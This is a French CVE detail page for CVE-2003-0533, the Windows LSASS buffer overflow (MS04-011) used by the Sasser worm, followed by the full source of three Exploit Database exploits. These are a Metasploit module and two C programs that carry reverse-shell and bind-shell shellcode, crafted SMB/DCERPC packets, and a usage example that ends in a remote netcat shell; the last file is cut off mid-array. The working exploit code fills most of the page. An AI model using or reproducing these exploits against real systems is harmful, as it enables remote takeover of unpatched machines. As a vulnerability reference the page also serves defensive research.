CVE-2003-0533 : Détail

CVE-2003-0533

97.26%V3
Network
2004-04-16
02h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 16368

Date de publication : 2010-07-02 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: ms04_011_lsass.rb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # # This module exploits a vulnerability in the LSASS service # include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 9669 $', 'References' => [ [ 'CVE', '2003-0533' ], [ 'OSVDB', '5248' ], [ 'BID', '10108' ], [ 'MSB', 'MS04-011' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ # Automatic [ 'Automatic Targetting', { 'Rets' => [ ], }, ], # Windows 2000 [ 'Windows 2000 English', { 'Rets' => [ 0x773242e0 ], }, ], # Windows XP [ 'Windows XP English', { 'Rets' => [ 0x7449bf1a ], }, ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 13 2004')) end def exploit connect() smb_login() handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc']) print_status("Binding to #{handle}...") dcerpc_bind(handle) print_status("Bound to #{handle}...") print_status('Getting OS information...') # Check the remote OS name and version os = smb_peer_os buff = '' case os # Windows 2000 requires that the string be unicode formatted # and give us a nice set of registers which point back to # the un-unicoded data. We simply return to a nop sled that # jumps over the return address, some trash, and into the # final payload. Easy as pie. when /Windows 5\.0/ str = rand_text_alphanumeric(3500) str[2020, 4] = [targets[1]['Rets'][0]].pack('V') str[2104, payload.encoded.length ] = payload.encoded buff = NDR.UnicodeConformantVaryingString(str) # Windows XP is a bit different, we need to use an ascii # buffer and a jmp esp. The esp register points to an # eight byte segment at the end of our buffer in memory, # we make these bytes jump back to the beginning of the # buffer, giving us about 1936 bytes of space for a # payload. when /Windows 5\.1/ str = rand_text_alphanumeric(7000) + "\x00\x00" str[0, payload.encoded.length ] = payload.encoded str[1964, 4] = [targets[2]['Rets'][0]].pack('V') str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload str[6998, 2] = "\x00\x00" buff = NDR.UnicodeConformantVaryingStringPreBuilt(str) # Unsupported target else print_status("No target is available for #{ os }") return end stub = buff + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + NDR.long(rand(0xFFFFFF)) + NDR.UnicodeConformantVaryingString('') + rand_text(528) + rand_text(528) + NDR.long(rand(0xFFFFFF)) print_status("Trying to exploit #{os}") begin response = dcerpc_call(9, stub) rescue Rex::Proto::DCERPC::Exceptions::NoResponse print_status('Server did not respond, but that should be ok...') rescue Rex::Proto::DCERPC::Exceptions::Fault case $!.fault when 0x1c010002 print_status('Server appears to have been patched') else print_status("Unexpected DCERPC fault 0x%.8x" % $!.fault) end end # Perform any required client-side payload handling handler end end
Exploit Database EDB-ID : 293

Date de publication : 2004-04-23 22h00 +00:00
Auteur : sbaa
EDB Vérifié : Yes

#include <windows.h> #pragma comment(lib,"mpr.lib") #pragma comment(lib, "ws2_32") unsigned char scode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99" "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12" "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99" "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9" "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D" "\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA" "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32" "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10" "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8" "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66" "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5" "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8" "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A" "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12" "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A" "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C" "\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33" "\xF9\x7E\xE0\x5F\xE0"; unsigned char scode2[] = "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A" "\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6" "\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D" "\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A" "\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58" "\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0" "\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41" "\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B" "\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D" "\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA" "\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10" "\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF" "\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8" "\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79" "\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C" "\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59" "\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD" "\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC" "\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5" "\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6" "\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0" "\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED" "\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99"; typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER) (unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long, unsigned long); DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer; #define LEN 3500 char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char buf2[2]; char target2[200]; int main(int argc, char *argv[]) { HMODULE hNetapi; int ret=0; int i; char c, *target; LPSTR hostipc[40]; NETRESOURCE netResource; unsigned short port; unsigned long ip; unsigned char* sc; if (argc < 3) { printf("Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\n \bug discoveried by eEye,\n \ code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1\n \ Usage: \n \ %s 0 targetip (Port ConnectBackIP ) \ ----> attack 2k (tested on cn sp4,en sp4)\n \ %s 1 targetip (Port ConnectBackIP ) \ ----> attack xp (tested on cn sp1)\n",argv[0],argv[0]); printf(""); return 0; } target = argv[2]; sprintf((char *)hostipc,"\\\\%s\\ipc$",target); netResource.lpLocalName = NULL; netResource.lpProvider = NULL; netResource.dwType = RESOURCETYPE_ANY; netResource.lpRemoteName=(char *)hostipc; ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session if (ret != 0) { printf("Create NULL session failed\n"); // return 1; } hNetapi = LoadLibrary("sbaaNetapi.dll"); if (!hNetapi) { printf("Can't load sbaaNetapi.dll.\n"); exit(0); } (DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer"); if (!DsRoleUpgradeDownlevelServer) { printf("Can't find function.\n"); exit(0); } memset(buf, '\x90', LEN); if(argc>4) { port = htons(atoi(argv[3]))^(USHORT)0x9999; ip = inet_addr(argv[4])^(ULONG)0x99999999; memcpy(&scode[118], &port, 2); memcpy(&scode[111], &ip, 4); sc=scode; } else { if(argc>3) { port = htons(atoi(argv[3]))^(USHORT)0x9999; memcpy(&scode2[176], &port, 2); } sc=scode2; } //attack all 2k sp3 version memcpy(&buf[2020], "\x95\x0c\x01\x78", 4); memcpy(&buf[2036], sc, strlen(sc)); //attack all 2k sp4 version memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4); memcpy(&buf[2844],"\x2b\x38\x03\x78",4); memcpy(&buf[2856], sc, strlen(sc)); printf("shellcode size %d\n", strlen(sc)); for(i=0; i<LEN; i++) { //unicode sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; if(atoi(argv[1])==1) { memcpy(&sendbuf, sc, strlen(sc)); memcpy(sendbuf+1964,"\xad\x14\x48\x74",4); memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16); memcpy(&sendbuf[1980], "\xeb\xde",2); } memset(target2, 0, 100); for(i=0; i<strlen(target); i++) { target2[i*2] = target[i]; target2[i*2+1] = 0; } memset(buf2, 0, 2); ret=0; ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]); printf("Ret value = %d\n",ret); WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE); FreeLibrary(hNetapi); return 0; } // milw0rm.com [2004-04-24]
Exploit Database EDB-ID : 295

Date de publication : 2004-04-28 22h00 +00:00
Auteur : houseofdabus
EDB Vérifié : Yes

/* HOD-ms04011-lsasrv-expl.c: * * MS04011 Lsasrv.dll RPC buffer overflow remote exploit * Version 0.1 coded by * * * .::[ houseofdabus ]::. * * * ------------------------------------------------------------------- * Usage: * * expl <target> <victim IP> <bindport> [connectback IP] [options] * * Targets: * 0 [0x01004600]: WinXP Professional [universal] lsass.exe * 1 [0x7515123c]: Win2k Professional [universal] netrap.dll * 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll * * Options: * -t: Detect remote OS: * Windows 5.1 - WinXP * Windows 5.0 - Win2k * ------------------------------------------------------------------- * * Tested on * - Windows XP Professional SP0 English version * - Windows XP Professional SP0 Russian version * - Windows XP Professional SP1 English version * - Windows XP Professional SP1 Russian version * - Windows 2000 Professional SP2 English version * - Windows 2000 Professional SP2 Russian version * - Windows 2000 Professional SP4 English version * - Windows 2000 Professional SP4 Russian version * - Windows 2000 Advanced Server SP4 English version * - Windows 2000 Advanced Server SP4 Russian version * * * Example: * * C:\HOD-ms04011-lsasrv-expl 0 192.168.1.10 4444 -t * * MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 * --- Coded by .::[ houseofdabus ]::. --- * * [*] Target: IP: 192.168.1.10: OS: WinXP Professional [universal] lsass.exe * [*] Connecting to 192.168.1.10:445 ... OK * [*] Detecting remote OS: Windows 5.0 * * * C:\HOD-ms04011-lsasrv-expl 1 192.168.1.10 4444 * * MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1 * --- Coded by .::[ houseofdabus ]::. --- * * [*] Target: IP: 192.168.1.10: OS: Win2k Professional [universal] netrap.dll * [*] Connecting to 192.168.1.10:445 ... OK * [*] Attacking ... OK * * C:\nc 192.168.1.10 4444 * Microsoft Windows 2000 [Version 5.00.2195] * (C) Copyright 1985-2000 Microsoft Corp. * * C:\WINNT\system32> * * * * This is provided as proof-of-concept code only for educational * purposes and testing by authorized individuals with permission to * do so. */ #include <windows.h> #pragma comment(lib, "ws2_32") // reverse shellcode unsigned char reverseshell[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99" "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12" "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99" "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9" "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D" "\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA" "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32" "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10" "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8" "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66" "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5" "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8" "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A" "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12" "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A" "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C" "\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33" "\xF9\x7E\xE0\x5F\xE0"; // bind shellcode unsigned char bindshell[] = "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A" "\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6" "\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D" "\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A" "\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58" "\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0" "\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41" "\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B" "\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D" "\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA" "\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10" "\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF" "\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8" "\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79" "\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C" "\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59" "\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD" "\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC" "\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5" "\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6" "\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0" "\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED" "\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99"; char req1[] = "\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F" "\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02" "\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F" "\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70" "\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30" "\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54" "\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00"; char req2[] = "\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00" "\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E" "\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00" "\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00" "\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00" "\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00" "\x2E\x00\x30\x00\x00\x00\x00\x00"; char req3[] = "\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00" "\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E" "\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46" "\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40" "\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40" "\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48" "\x00\x4F\x00\x44\x00\x00\x81\x19\x6A\x7A\xF2\xE4\x49\x1C\x28\xAF" "\x30\x25\x74\x10\x67\x53\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00" "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00" "\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00" "\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00" "\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00"; char req4[] = "\x00\x00\x00\x5C\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x08\x30\x00\x04\xFF\x00\x5C\x00\x08\x00\x01\x00\x31\x00\x00" "\x5C\x00\x5C\x00\x31\x00\x39\x00\x32\x00\x2E\x00\x31\x00\x36\x00" "\x38\x00\x2E\x00\x31\x00\x2E\x00\x32\x00\x31\x00\x30\x00\x5C\x00" "\x49\x00\x50\x00\x43\x00\x24" "\x00\x00\x00\x3F\x3F\x3F\x3F\x3F\x00"; char req5[] = "\x00\x00\x00\x64\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04" "\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x0E\x00\x16\x00\x00\x00" "\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" "\x02\x00\x00\x00\x03\x11\x00\x00\x5C\x00\x6C\x00\x73\x00\x61\x00" "\x72\x00\x70\x00\x63\x00\x00\x00"; char req6[] = "\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04" "\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x04\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02" "\x00\x26\x00\x00\x40\x59\x00\x10\x5C\x00\x50\x00\x49\x00\x50\x00" "\x45\x00\x5C\x00\x00\x00\x00\x00\x05\x00\x0B\x03\x10\x00\x00\x00" "\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00" "\x01\x00\x00\x00\x00\x00\x01\x00\x6A\x28\x19\x39\x0C\xB1\xD0\x11" "\x9B\xA8\x00\xC0\x4F\xD9\x2E\xF5\x00\x00\x00\x00\x04\x5D\x88\x8A" "\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00"; char req7[] = "\x00\x00\x0C\xF4\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04" "\x00\x08\x60\x00\x10\x00\x00\xA0\x0C\x00\x00\x00\x04\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\xA0\x0C\x54\x00\x02" "\x00\x26\x00\x00\x40\xB1\x0C\x10\x5C\x00\x50\x00\x49\x00\x50\x00" "\x45\x00\x5C\x00\x00\x00\x00\x00\x05\x00\x00\x03\x10\x00\x00\x00" "\xA0\x0C\x00\x00\x01\x00\x00\x00\x88\x0C\x00\x00\x00\x00\x09\x00" "\xEC\x03\x00\x00\x00\x00\x00\x00\xEC\x03\x00\x00"; // room for shellcode here ... char shit1[] = "\x95\x14\x40\x00\x03\x00\x00\x00\x7C\x70\x40\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x7C\x70\x40\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x7C\x70\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x7C\x70\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00" "\x01\x00\x00\x00\x00\x00\x00\x00\x78\x85\x13\x00\xAB\x5B\xA6\xE9"; char req8[] = "\x00\x00\x10\xF8\xFF\x53\x4D\x42\x2F\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xFF\xFE" "\x00\x08\x60\x00\x0E\xFF\x00\xDE\xDE\x00\x40\x00\x00\x00\x00\xFF" 